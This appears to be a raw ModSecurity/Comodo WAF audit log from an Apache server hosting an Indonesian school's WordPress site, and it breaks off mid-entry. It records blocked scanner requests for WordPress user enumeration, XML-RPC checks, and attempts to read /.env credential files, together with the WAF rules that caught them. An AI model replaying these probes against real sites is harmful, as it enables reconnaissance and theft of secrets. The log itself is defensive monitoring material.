"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746755510038312 6790 (- - -) Stopwatch2: 1746755510038312 6790; combined=4816, p1=589, p2=3969, p3=39, p4=43, p5=103, sr=76, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1b0f819-Z-- --2c43a67d-A-- [09/May/2025:09:07:52 +0700] aB1jeFqQ1nOVx9fWpZTD9AAAABU 103.236.140.4 46444 103.236.140.4 8181 --2c43a67d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2c43a67d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c43a67d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746756472803764 3462 (- - -) Stopwatch2: 1746756472803764 3462; combined=1480, p1=496, p2=948, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c43a67d-Z-- --5fe4ba6f-A-- [09/May/2025:09:07:58 +0700] aB1jfh6q_ZMebht3q15VtAAAAIc 103.236.140.4 46448 103.236.140.4 8181 --5fe4ba6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5fe4ba6f-C-- demo.sayHello --5fe4ba6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fe4ba6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746756478230946 5197 (- - -) Stopwatch2: 1746756478230946 5197; combined=3913, p1=484, p2=3206, p3=23, p4=26, p5=100, sr=69, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fe4ba6f-Z-- --281c333f-A-- [09/May/2025:09:11:28 +0700] aB1kUC-fAO47ojYKsMoZDAAAAFM 103.236.140.4 46468 103.236.140.4 8181 --281c333f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --281c333f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281c333f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746756688645546 3466 (- - -) Stopwatch2: 1746756688645546 3466; combined=1457, p1=481, p2=944, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281c333f-Z-- --487a6503-A-- [09/May/2025:09:11:33 +0700] aB1kVS-fAO47ojYKsMoZDQAAAFc 103.236.140.4 46472 103.236.140.4 8181 --487a6503-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --487a6503-C-- demo.sayHello --487a6503-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --487a6503-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746756693346597 4951 (- - -) Stopwatch2: 1746756693346597 4951; combined=3870, p1=455, p2=3197, p3=30, p4=33, p5=92, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487a6503-Z-- --d9d17712-A-- [09/May/2025:09:13:53 +0700] aB1k4R6q_ZMebht3q15VuAAAAI0 103.236.140.4 46484 103.236.140.4 8181 --d9d17712-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d9d17712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9d17712-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746756833434788 3458 (- - -) Stopwatch2: 1746756833434788 3458; combined=1473, p1=498, p2=938, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9d17712-Z-- --2123fc57-A-- [09/May/2025:09:14:00 +0700] aB1k6B6q_ZMebht3q15VuQAAAIs 103.236.140.4 46488 103.236.140.4 8181 --2123fc57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2123fc57-C-- demo.sayHello --2123fc57-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2123fc57-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746756840926174 5765 (- - -) Stopwatch2: 1746756840926174 5765; combined=4222, p1=537, p2=3530, p3=21, p4=23, p5=65, sr=76, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2123fc57-Z-- --1e052b1b-A-- [09/May/2025:09:18:38 +0700] aB1l_loC-7ITMWTA_c98EwAAAMI 103.236.140.4 46514 103.236.140.4 8181 --1e052b1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e052b1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e052b1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746757118202668 3447 (- - -) Stopwatch2: 1746757118202668 3447; combined=1529, p1=544, p2=948, p3=0, p4=0, p5=37, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e052b1b-Z-- --429de92c-A-- [09/May/2025:09:18:45 +0700] aB1mBVoC-7ITMWTA_c98FQAAAMY 103.236.140.4 46518 103.236.140.4 8181 --429de92c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.56 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --429de92c-C-- demo.sayHello --429de92c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --429de92c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746757125560810 5187 (- - -) Stopwatch2: 1746757125560810 5187; combined=3966, p1=476, p2=3278, p3=23, p4=26, p5=95, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --429de92c-Z-- --4c9c356b-A-- [09/May/2025:10:46:10 +0700] aB16gi-fAO47ojYKsMoZbgAAAFg 103.236.140.4 47184 103.236.140.4 8181 --4c9c356b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.189.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.189.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4c9c356b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c9c356b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746762370866950 791 (- - -) Stopwatch2: 1746762370866950 791; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c9c356b-Z-- --371a5e42-A-- [09/May/2025:11:17:29 +0700] aB2B2S-fAO47ojYKsMobSgAAAEg 103.236.140.4 50696 103.236.140.4 8181 --371a5e42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --371a5e42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --371a5e42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746764249969021 3349 (- - -) Stopwatch2: 1746764249969021 3349; combined=1406, p1=441, p2=926, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --371a5e42-Z-- --e98fca06-A-- [09/May/2025:11:17:36 +0700] aB2B4FoC-7ITMWTA_c99uQAAANE 103.236.140.4 50700 103.236.140.4 8181 --e98fca06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e98fca06-C-- demo.sayHello --e98fca06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e98fca06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746764256386781 5732 (- - -) Stopwatch2: 1746764256386781 5732; combined=4041, p1=679, p2=3152, p3=23, p4=25, p5=96, sr=141, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e98fca06-Z-- --2d4e8343-A-- [09/May/2025:12:01:40 +0700] aB2MNFqQ1nOVx9fWpZTFkwAAAAw 103.236.140.4 50872 103.236.140.4 8181 --2d4e8343-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.51.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.51.157 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2d4e8343-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d4e8343-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746766900038193 887 (- - -) Stopwatch2: 1746766900038193 887; combined=342, p1=299, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d4e8343-Z-- --263edb62-A-- [09/May/2025:12:23:18 +0700] aB2RRlqQ1nOVx9fWpZTGfgAAAA0 103.236.140.4 54234 103.236.140.4 8181 --263edb62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.212.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.212.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --263edb62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --263edb62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746768198429756 3199 (- - -) Stopwatch2: 1746768198429756 3199; combined=1456, p1=540, p2=881, p3=0, p4=0, p5=35, sr=158, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --263edb62-Z-- --7124f453-A-- [09/May/2025:12:25:32 +0700] aB2RzFoC-7ITMWTA_c9_igAAAMQ 103.236.140.4 55988 103.236.140.4 8181 --7124f453-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7124f453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7124f453-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746768332918262 683 (- - -) Stopwatch2: 1746768332918262 683; combined=271, p1=241, p2=0, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7124f453-Z-- --8e2f097c-A-- [09/May/2025:12:25:33 +0700] aB2RzS-fAO47ojYKsMogeQAAAFc 103.236.140.4 56002 103.236.140.4 8181 --8e2f097c-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8e2f097c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e2f097c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746768333714388 912 (- - -) Stopwatch2: 1746768333714388 912; combined=348, p1=304, p2=0, p3=0, p4=0, p5=43, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e2f097c-Z-- --a3379932-A-- [09/May/2025:13:08:41 +0700] aB2b6S-fAO47ojYKsMolgAAAAEI 103.236.140.4 39298 103.236.140.4 8181 --a3379932-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.57.190.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.57.190.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3379932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3379932-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746770921898936 2654 (- - -) Stopwatch2: 1746770921898936 2654; combined=1183, p1=417, p2=733, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3379932-Z-- --02eba679-A-- [09/May/2025:13:17:30 +0700] aB2d-i-fAO47ojYKsMolggAAAEg 103.236.140.4 39328 103.236.140.4 8181 --02eba679-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49 Accept-Charset: utf-8 --02eba679-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02eba679-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746771450850934 861 (- - -) Stopwatch2: 1746771450850934 861; combined=380, p1=339, p2=0, p3=0, p4=0, p5=40, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02eba679-Z-- --cfbf867f-A-- [09/May/2025:13:17:48 +0700] aB2eDFoC-7ITMWTA_c-FMgAAAME 103.236.140.4 39330 103.236.140.4 